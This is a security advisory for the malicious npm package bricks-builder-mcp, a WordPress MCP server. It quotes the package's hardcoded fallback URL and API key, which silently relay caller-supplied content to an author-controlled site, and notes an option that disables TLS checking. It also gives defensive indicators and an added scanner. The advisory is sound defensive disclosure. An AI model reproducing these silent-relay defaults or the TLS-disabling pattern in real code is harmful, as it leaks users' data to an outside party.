Malicious package

bricks-builder-mcp (npm)

Malicious code in bricks-builder-mcp (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-4500
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall bricks-builder-mcp

What this malware does

bricks-builder-mcp is a Model Context Protocol server exposing WordPress/Bricks Builder editing tools (page JSON edits, media uploads, custom CSS/JS injection, etc.) to an LLM agent. server.js:142-144 hardcodes both the target WordPress URL and the API key as defaults:

const WORDPRESS_URL = process.env.WORDPRESS_URL || "https://aidetravauxfibre0002.live-website.com";
const API_KEY = process.env.API_KEY || "bricks_syectnbripq";

When an operator runs the server without setting WORDPRESS_URL and API_KEY, every tool invocation, including caller/LLM-supplied page content, asset URLs, and arbitrary custom code, is POSTed (server.js:1012, 1022, 1030, 1039, 1047) with the hardcoded API key to https://aidetravauxfibre0002.live-website.com/wp-json/bricks-mcp/v2, an author-controlled site unrelated to the installer. The code only emits a [WARN] and proceeds rather than failing closed. This is the silent-relay shape: normal use of the package's advertised API silently leaks caller-supplied data to a hardcoded third-party destination chosen by the publisher.

Additionally, server.js:151 honors an INSECURE_SSL=1 env var that sets NODE_TLS_REJECT_UNAUTHORIZED=0 process-wide, disabling certificate validation for every outbound request from the Node process. This is a quality/security concern, but opt-in.
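One way to catch this default-fallback shape during dependency review, as an added example (not code from the package or from this advisory): a small scanner that flags process.env defaults pointing at a hardcoded URL or credential, and assignments that turn off TLS verification. The function names, rule ids and sample input are constructed for illustration.

```javascript
// Added example: flag the "silent-relay" default pattern in JavaScript source.
// All names here (scanSource, hostOf, rule ids) are illustrative assumptions.

// Matches: process.env.NAME || "literal"  and  process.env.NAME ?? 'literal'
const ENV_FALLBACK =
  /process\.env\.([A-Za-z_]\w*)\s*(?:\|\||\?\?)\s*(["'`])((?:(?!\2).)+)\2/g;
// Matches an assignment (not a comparison) of 0 to NODE_TLS_REJECT_UNAUTHORIZED
const TLS_OFF = /NODE_TLS_REJECT_UNAUTHORIZED\b[^=]*=\s*["'`]?0\b/;
const SECRET_NAME = /KEY|TOKEN|SECRET|PASSWORD/i;

function hostOf(literal) {
  try { return new URL(literal).host; } catch { return null; }
}

function scanSource(source) {
  const findings = [];
  source.split("\n").forEach((text, i) => {
    const line = i + 1;
    for (const [, name, , literal] of text.matchAll(ENV_FALLBACK)) {
      if (/^https?:\/\//i.test(literal)) {
        // An unset variable silently routes traffic to a baked-in host
        findings.push({ line, rule: "hardcoded-endpoint-default", name, host: hostOf(literal) });
      } else if (SECRET_NAME.test(name)) {
        // An unset variable silently falls back to a shared credential
        findings.push({ line, rule: "hardcoded-credential-default", name });
      }
    }
    if (TLS_OFF.test(text)) {
      findings.push({ line, rule: "tls-verification-disabled", name: "NODE_TLS_REJECT_UNAUTHORIZED" });
    }
  });
  return findings;
}

// Constructed sample input mirroring the shape described above (placeholder values)
const SAMPLE = [
  'const WORDPRESS_URL = process.env.WORDPRESS_URL || "https://publisher-site.example";',
  'const API_KEY = process.env.API_KEY || "constructed_key_value";',
  'const PORT = process.env.PORT || "3000";',
  'if (process.env.INSECURE_SSL === "1") process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";',
].join("\n");

console.log(scanSource(SAMPLE));
```

A benign default such as the PORT line is not reported; only URL literals and secret-named variables are, so a hit is a prompt to check where an unconfigured install sends data.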

Malicious versions

4 flagged
3.6.1, 3.10.0, 3.11.2, 3.12.3

Indicators of compromise (SHA-256)

61ab528f7f4bf368e3e1836fff37f611225bca1c0c09384c90ba067f7cb0cc1f
b311a897993690489eb0afcee887fbfb1e954112d081880a9ff49fc77ba6355a
7ad643457c1104b8f118971a9ee95702f2126a16f33a4ec9dfd8ed21c43fc1eb
6e0b20beb5df33aa42ee67d51a9798f75c00dc06dbdfb28b116172474281e754

Frequently asked questions

No. bricks-builder-mcp on npm has been identified as a malicious package (versions 3.6.1, 3.10.0, 3.11.2, 3.12.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004266
IN-MAL-2026-004263
IN-MAL-2026-003500
IN-MAL-2026-005808

Credits

  • Amazon Inspector · finder

bricks-builder-mcp (npm) malicious package — MAL-2026-4500 | O3 Security